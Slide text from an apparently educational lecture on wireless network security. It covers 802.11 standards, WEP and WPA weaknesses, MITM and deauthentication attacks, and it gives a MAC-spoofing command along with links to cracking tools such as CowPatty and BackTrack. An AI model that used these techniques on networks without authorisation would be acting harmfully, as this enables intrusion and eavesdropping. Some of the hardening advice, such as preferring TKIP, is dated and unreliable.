802.11 Standards (Cont.)

 802.11e – QoS
 Dubbed “Wireless MultiMedia (WMM)” by Wi-Fi Alliance
 802.11i – Security
 Adds AES encryption
 Requires high cpu, new chips required
 TKIP is interim solution
 802.11n –(2009)
 up to 300Mbps
 5Ghz and/or 2.4Ghz
 ~230ft range
 802.11ac – (under development)
 Will provide high through put in the 5 GHz band
 Will use wider RF bandwidth
 will enable multi-station WLAN throughput of at least 1
Gbps
 a maximum single link throughput of at least 500 Mbps


Wireless Network Modes

 The 802.11 wireless networks operate in two basic
modes:
1. Infrastructure mode
2. Ad-hoc mode

 Infrastructure mode:
 each wireless client connects directly to a central
device called Access Point (AP)
 no direct connection between wireless clients
 AP acts as a wireless hub that performs the
connections and handles them between wireless
clients


Wireless Network Modes (cont’d)

 The hub handles:
 the clients’ authentication,
 Authorization
 link-level data security (access control and
enabling data traffic encryption)
 Ad-hoc mode:
 Each wireless client connects directly with each other
 No central device managing the connections
 Rapid deployment of a temporal network where no
infrastructures exist (advantage in case of disaster…)
 Each node must maintain its proper authentication
list


Security Threats

• Wireless technology doesn’t remove any old security
issues, but introduces new ones
– Viruses, Trojans and stuff like that are still there
– Eavesdropping
– Man-in-the-middle attacks
– Denial of Service

Eavesdropping (Sniffing)

• Easy to perform, almost impossible to detect
• By default, everything is transmitted in clear
text
– Usernames, passwords, content ...
– No security offered by the transmission
medium
• Different tools available on the internet
– Network sniffers, protocol analysers . . .
• With the right equipment, it’s possible to
eavesdrop traffic from few kilometers away

Wireless Man in the Middle (MITM) Attack
In a MITM attack, the attacker funnels victim’s traffic through a
point controlled by the attacker. Allows data analysis and
manipulation
1. Attacker spoofes a
disassociate message
from the victim
2. The victim starts to look
for a new access point,
and the attacker
advertises his own AP on
a different channel, using
the real AP’s MAC
address
3. The attacker connects to
the real AP using victim’s
MAC address

Denial of Service

• Frequency jamming
– Not very technical, but works
• Spoofed deauthentication / disassociation
messages
– can target one specific user

• Attacks on higher levels
– SYN Flooding
– Ping of death
– ...

SSID – Service Set Identification
 Identifies a particular wireless network
 A client must set the same SSID as the one in that
particular AP Point to join the network
 Without SSID, the client won’t be able to select and join
a wireless network
 Hiding SSID is not a security measure because the
wireless network in this case is not invisible
 It can be defeated by intruders by sniffing it from any
probe signal containing it.
 So easy to find the ID for a “hidden” network because
the beacon broadcasting cannot be turned off
 Simply use a utility to show all the current networks:
 inSSIDer
 NetStumbler
 Kismet

IEEE 802.11 Security – Access control list

 Access control list
 Simplest security measure
 Filtering out unknown users
 Requires a list of authorized clients’ MAC addresses to
be loaded in the AP
 Won’t protect each wireless client nor the traffic
confidentiality and integrity ===>vulnerable
 Defeated by MAC spoofing:
 ifconfig eth0 hw ether 00:01:02:03:04:05 (Linux)
 SMAC - KLC Consulting (Windows)
 MAC Makeup - H&C Works (Windows)


WEP - Wired Equivalent Privacy

 The original native security mechanism for WLAN

 Used to protect wireless communication from
eavesdropping (‫()التنصت‬confidentiality)

 Prevent unauthorized access to a wireless network (access
control)

 Prevent tampering with transmitted messages (integrity)

 Provide users with the equivalent level of privacy inbuilt in
wireless networks.


WEP
1. Appends a 32-bit CRC checksum to each outgoing frame
(INTEGRITY)

2. Encrypts the frame using RC4 stream cipher = 40-bit
(standard) or 104-bit (Enhanced) keys + a 24-bit IV random
initialization vector (CONFIDENTIALITY).

3. The Initialization Vector (IV) and default key on the station
access point are used to create a key stream. The key stream
is then used to convert the plain text message into the WEP
encrypted frame.

 Initialization Vector IV
 Dynamic 24-bit value
 Chosen randomly by the transmitter wireless network
interface
 16.7 million possible keys (224)

How WEP work


RC4 keystream XORed with plaintext

 XOR operation
 denoted as ⊕
 plain-text ⊕ keystream= cipher-text
 cipher-text ⊕ keystream= plain-text
 plain-text ⊕ cipher-text= keystream

WEP Authentication
1. The station sends an authentication request to AP
2. AP sends challenge text called nonce to the station.
3. The station uses its configured 64-bit or 128-bit default key to
encrypt the nonce, and it sends the latter to AP.
4. AP decrypts the encrypted nonce using its configured WEP key
that corresponds to the station's default key.
5. AP compares the decrypted nonce with the original nonce.
6. If the decrypted nonce matches the original nonce, then the
access point and the station
share the same WEP key, and
the access point authenticates
the station.
7. The station connects to the
network.

WEP authentication problems

Plaintext attack
• Attacker sniffs nonce (challenge), m, sent by
AP
• Attacker sniffs response sent by station:
– IV in clear
– Encrypted nonce, c
• Attacker calculates keystream ks = m ⊕ c,
which is the keystream for the IV .
• Attacker then requests access to channel,
receives nonce m’
• Attacker forms response c’ = ks ⊕ m’ and IV
• Server decrypts, matches m’ and declares
attacker authenticated !
17

WEP flaws and vulnerabilities
 IV reuse and small size:
 There are 224 different IVs
 On a busy network, the IV will surely be reused, if
the default key has not been changed and the
original message can be retrieved relatively easily.
 With IV reuse, it is possible to determine keystreams
and hence enable an attacker to forge packets
obtaining access to the WLAN.


Attacks on WEP

WEP encrypted networks can be cracked in 10 minutes

Goal is to collect enough IVs to be able to crack the key

IV = Initialization Vector, plaintext appended to the key to
avoid Repetition

Injecting packets generates IVs


Attacks on WEP

 Backtrack 5 (Released 1st March 2012)

 Tutorial is available

 All required tools on a Linux
bootable CD + laptop +
wireless card


WEP cracking example


WPA – (WI-FI Protected Access)
 New technique in 2002. Overcomes the security flaws of WEP.

 Improved data encryption – Data is encrypted using the RC4
stream cipher, with a 128-bit key and a 48-bit initialization
vector (IV). 248 is a large number! More than 500 trillion

 Because of many attacks related to static key in WEP, WPA
uses a Temporal Key Integrity Protocol (TKIP), which
dynamically changes keys as the system is used. This
combined with the much larger IV, defeats the well-known key
recovery attacks on WEP.

 A more secure message authentication code (usually known
as a MAC, but here termed as MIC for "Message Integrity
Code") is used in WPA, an algorithm named "Michael".

WPA2 - WI-FI Protected Access 2

 Based on the IEEE 802.i standard
 2 versions: Personal & Enterprise
 The primary enhancement over WPA is the use of the
AES (Advanced Encryption Standard) algorithm
 The encryption in WPA2 is done by utilizing either
AES or TKIP
 The Personal mode uses a PSK (Pre-shared key) &
does not require a separate authentication of users
 The enterprise mode requires the users to be
separately authenticated by using the EAP protocol


Am I secure if I use WPA-PSK

 WPA-PSK protected networks are vulnerable to dictionary
attacks
 Works with WPA & WPA2 (802.11i)
 New attack techniques have increased the speed of this attack
– CowPatty (
http://wirelessdefence.org/Contents/coWPAttyMain.htm )
 Run CowPatty against packets to crack the key
 Needs SSID to crack the WPA-PSK, easily obtainable!
 Also supports WPA2-PSK cracking with the same pre-
computed tables!
 Spoof the Mac address of the AP and tell client to disassociate
 Sniff the wireless network for the WPA-PSK handshake (EAPOL)


WPA Cracking Example


Wireless Network tools

 MAC Spoofing
 http://aspoof.sourceforge.net/
 http://www.gorlani.com/publicprj/macmakeup/macmakeup.asp
 http://www.klcconsulting.net/smac/
 WEP Cracking tools
 http://www.backtrack-linux.org/
 http://www.remote-exploit.org/articles/backtrack/index.html
 http://wepattack.sourceforge.net/
 http://wepcrack.sourceforge.net/
 Wireless Analysers
 http://www.kismetwireless.net/
 http://www.netstumbler.com/


Techniques to improve wireless security
 Use wireless intrusion prevention system (WIPS)

 Enable WPA-PSK

 Use a good password (https://grc.com/password)

 Use WPA2 where possible

 AES is more secure, use TKIP for better performance

 Change your SSID every so often

 Wireless network users should use or upgrade their
network to the latest released security standard

Guide to Wireless Network Security Standards and Protocols

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to Guide to Wireless Network Security Standards and Protocols

Similar to Guide to Wireless Network Security Standards and Protocols (20)

Guide to Wireless Network Security Standards and Protocols

Editor's Notes